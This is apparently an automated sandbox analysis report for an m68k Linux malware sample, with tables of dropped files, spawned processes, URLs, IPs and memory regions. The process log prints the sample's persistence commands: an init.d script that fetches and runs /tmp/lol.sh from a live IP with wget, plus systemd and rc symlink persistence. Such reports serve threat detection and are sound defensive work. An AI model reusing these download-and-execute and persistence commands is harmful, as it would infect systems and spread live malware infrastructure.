Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
m68k.nn.elf
|
ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
|
initial sample
|
||
/etc/init.d/m68k.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/profile
|
ASCII text
|
dropped
|
||
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/boot/bootcmd
|
ASCII text
|
dropped
|
||
/etc/inittab
|
ASCII text
|
dropped
|
||
/etc/motd
|
ASCII text
|
dropped
|
||
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
/tmp/qemu-open.NgO5at (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/tmp/m68k.nn.elf
|
/tmp/m68k.nn.elf
|
||
/tmp/m68k.nn.elf
|
-
|
||
/tmp/m68k.nn.elf
|
-
|
||
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
/tmp/m68k.nn.elf
|
-
|
||
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
/tmp/m68k.nn.elf
|
-
|
||
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
/tmp/m68k.nn.elf
|
-
|
||
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf
&\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping
m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0
{start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"
|
||
/tmp/m68k.nn.elf
|
-
|
||
/bin/sh
|
sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/m68k.nn.elf
|
||
/tmp/m68k.nn.elf
|
-
|
||
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
/tmp/m68k.nn.elf
|
-
|
||
/bin/sh
|
sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf
|
||
/tmp/m68k.nn.elf
|
-
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
/usr/sbin/gdm3
|
-
|
||
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
/usr/sbin/gdm3
|
-
|
||
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/systemd/systemd
|
-
|
||
/lib/systemd/systemd-user-runtime-dir
|
/lib/systemd/systemd-user-runtime-dir stop 127
|
There are 40 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
http://193.143.1.70/curl.sh
|
unknown
|
||
http://193.143.1.70/lol.sh
|
unknown
|
||
http://193.143.1.70/
|
unknown
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
daisy.ubuntu.com
|
162.213.35.25
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
154.216.19.139
|
unknown
|
Seychelles
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7f111401e000
|
page execute read
|
|||
7f111401e000
|
page execute read
|
|||
7f1114024000
|
page read and write
|
|||
556f8d37c000
|
page read and write
|
|||
556f8b2e7000
|
page read and write
|
|||
556f8de51000
|
page read and write
|
|||
7f119a7d3000
|
page read and write
|
|||
7f119a536000
|
page read and write
|
|||
7f119ab95000
|
page read and write
|
|||
7f119af05000
|
page read and write
|
|||
556f8d37c000
|
page read and write
|
|||
556f8d2e5000
|
page execute and read and write
|
|||
556f8b0ad000
|
page execute read
|
|||
7f119abba000
|
page read and write
|
|||
7f119b07b000
|
page read and write
|
|||
556f8de51000
|
page read and write
|
|||
7fff4deef000
|
page execute read
|
|||
7fff4de0e000
|
page read and write
|
|||
556f8b2e7000
|
page read and write
|
|||
7f119b02e000
|
page read and write
|
|||
7f119ab95000
|
page read and write
|
|||
7fff4de0e000
|
page read and write
|
|||
7f1194000000
|
page read and write
|
|||
7f1199d33000
|
page read and write
|
|||
7f1114029000
|
page read and write
|
|||
7f119abba000
|
page read and write
|
|||
7f119b07b000
|
page read and write
|
|||
7f119af05000
|
page read and write
|
|||
556f8b2df000
|
page read and write
|
|||
7f1114020000
|
page read and write
|
|||
7f1199d33000
|
page read and write
|
|||
7f1114024000
|
page read and write
|
|||
7f1194000000
|
page read and write
|
|||
7f1194021000
|
page read and write
|
|||
7fff4deef000
|
page execute read
|
|||
7f119b036000
|
page read and write
|
|||
7f119a536000
|
page read and write
|
|||
7f1114020000
|
page read and write
|
|||
7f119b02e000
|
page read and write
|
|||
7f119a544000
|
page read and write
|
|||
556f8d2e5000
|
page execute and read and write
|
|||
7f119a544000
|
page read and write
|
|||
556f8b2df000
|
page read and write
|
|||
7f119a7d3000
|
page read and write
|
|||
7f119b036000
|
page read and write
|
|||
556f8b0ad000
|
page execute read
|
|||
7f1194021000
|
page read and write
|
There are 37 hidden memdumps, click here to show them.